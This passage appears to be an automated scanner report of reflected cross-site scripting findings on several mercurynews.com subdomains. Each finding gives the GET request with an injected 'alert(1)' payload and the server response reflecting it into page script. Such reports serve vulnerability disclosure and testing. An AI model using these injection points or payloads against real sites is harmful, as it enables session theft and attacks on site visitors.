s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /xml/comments |
GET /xml/comments?c1a8b"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:19 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:43 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22068 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... "JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / xml/comments?c1a8b"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /xml/poll-link |
GET /xml2ff9b"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:46 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:10 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22104 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... language="JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / xml2ff9b"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campai ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /xml/poll-link |
GET /xml/poll-linka4083"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:07:00 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:07:24 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22104 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... "JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / xml/poll-linka4083"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCiQu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://forums.mercurynews |
Path: | /xml/poll-link |
GET /xml/poll-link?82efb"-alert(1)- Host: forums.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; SESS7d37fc218a44afb2 |
HTTP/1.1 404 Not Found Date: Mon, 15 Nov 2010 02:06:34 GMT Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.6 X-Powered-By: PHP/5.2.6 Expires: Sun, 19 Nov 1978 05:00:00 GMT Last-Modified: Mon, 15 Nov 2010 02:06:58 GMT Cache-Control: store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 22070 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title ...[SNIP]... JavaScript"> if (typeof s != 'undefined') { s.pageName=""; s.channel="Forums"; s.prop1="Home"; s.prop2=s.prop1 + " / Opinion"; s.prop3=s.prop2 + " / Forums"; s.prop4=s.prop3 + " / xml/poll-link?82efb"-alert(1)- s.prop9=getCiQueryString( s.campaign=getCiQuer s.events="event1"; s.eVar2=getCiQueryString( s.eVar4=s.pageName; s.campaign=getCi ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://newspaperads |
Path: | /FSI/Page.aspx |
GET /FSI/Page.aspx?advid Host: newspaperads.mercurynews Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; s_cc=true; ZZFLSH=29; location=53824; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116 |
HTTP/1.1 200 OK Connection: close Date: Mon, 15 Nov 2010 02:09:23 GMT Server: Microsoft-IIS/6.0 X-Server-Name: HW3 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 48110 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... newspaperads.mercurynews s_pageName = ''; s_channel = 'FSI'; s_prop4 = 'FSI | | - |'; s_prop3 = 'FSI |'; s_prop5 = 'FSI |'; s_prop13 = 'FSI |'; s_prop20 = 'FSI | | 53824 | | 14784 | Mercury454b3\\';alert(1)/ s_az.pageName = 'FSI | Page View'; s_az.channel = 'FSI'; s_az.pageType = ''; s_az.prop1 = ''; s_az.prop2 = ''; s_az.prop3 = 'FSI |'; s_az.prop4 = 'FSI | | | - |'; s_az.prop5 = 'FSI |' ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.www |
Path: | /portlet/registration |
GET /portlet/registration Host: secure.www.mercurynews Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.0 200 OK Date: Mon, 15 Nov 2010 02:09:35 GMT Server: Apache/2.0.52 (Red Hat) X-ATG-Version: ATGPlatform/7.1p2 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Set-Cookie: JSESSIONID=ZWT54CTJM Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Length: 1676 Connection: close Content-Type: text/html; charset=UTF-8 <html><head><script><!-- window.focus(); //--></script><link type="text/css" rel="stylesheet" href='https://secure function o ...[SNIP]... <!-- BEGIN FREEFORM RENDER, ID 8101685c15c0--><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.www |
Path: | /registration/ |
GET /registration/?rPage Host: secure.www.mercurynews Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.0 404 Not Found Date: Mon, 15 Nov 2010 02:09:38 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=0QISC2X0J Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> ...[SNIP]... rBrand = getBrand2(s_account); var PageName = "Registration"; var SectionName = "Registration"; var ArticleTitle = "null"; var FriendlyName = "Registration: login6fb02</script><script var domainName = getDomainName(); userObj = new omniObj(); userObj.load(); userObj.update(); userObj.save(); /* You may give each page an identifying name, server, and cha ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.www |
Path: | /registration/ |
GET /registration/?rPage Host: secure.www.mercurynews Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.0 200 OK Date: Mon, 15 Nov 2010 02:09:39 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=XBSY2AYHL Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> ...[SNIP]... <a href="/registration?rPage ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://weather.mercu |
Path: | /cgi-bin/findweather |
GET /cgi-bin/findweather Host: weather.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ZZRDB162,570,21=1; ZZFLSH=29; s_cc=true; ASC=1289776044:1; s_sq=%5B%5BB%5D%5D; __qca=P0-1453715116 |
HTTP/1.1 200 OK Date: Mon, 15 Nov 2010 02:10:46 GMT Server: Apache/1.3.33 (Unix) PHP/4.4.0 X-CreationTime: 0.060 Set-Cookie: ASC=1289787046:2; path=/; expires=Fri, 01-Jan-2020 00:00:00 GMT; domain=.wunderground.com Connection: close Content-Type: text/html Content-Length: 25776 <HTML> <head> <title>Weather </title> </head> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="Pragma" CONTENT"no-cache"> <title>San Jose Mercury N ...[SNIP]... <a href="/auto/mercurynewsbe8ab"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mercurynews |
Path: | /mngi/tracking/track |
GET /mngi/tracking/track?s Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.mercurynews.com Proxy-Connection: Keep-Alive Cookie: EMETA_COOKIE_CHECK_MNGI=1 |
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-ATG-Version: ATGPlatform/7.1p2 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Vary: Accept-encoding Expires: Sun, 14 Nov 2010 23:06:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 23:06:02 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 147 TrackingServlet.service() |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mercurynews |
Path: | /mngi/tracking/track |
GET /mngi/tracking/track?s Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.mercurynews.com Proxy-Connection: Keep-Alive Cookie: EMETA_COOKIE_CHECK_MNGI=1 |
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-ATG-Version: ATGPlatform/7.1p2 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Vary: Accept-encoding Expires: Sun, 14 Nov 2010 23:06:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 23:06:07 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 147 TrackingServlet.service() |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mercurynews |
Path: | /mngi/tracking/track |
GET /mngi/tracking/track?s Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.mercurynews.com Proxy-Connection: Keep-Alive Cookie: EMETA_COOKIE_CHECK_MNGI=1 |
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-ATG-Version: ATGPlatform/7.1p2 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Vary: Accept-encoding Expires: Sun, 14 Nov 2010 23:06:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 23:06:00 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 147 TrackingServlet.service() |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mercurynews |
Path: | /mngi/tracking/track |
GET /mngi/tracking/track?s Accept: */* Referer: http://www.mercurynews Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: www.mercurynews.com Proxy-Connection: Keep-Alive Cookie: EMETA_COOKIE_CHECK_MNGI=1 |
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) X-ATG-Version: ATGPlatform/7.1p2 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Vary: Accept-encoding Expires: Sun, 14 Nov 2010 23:06:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 14 Nov 2010 23:06:05 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 146 TrackingServlet.service() |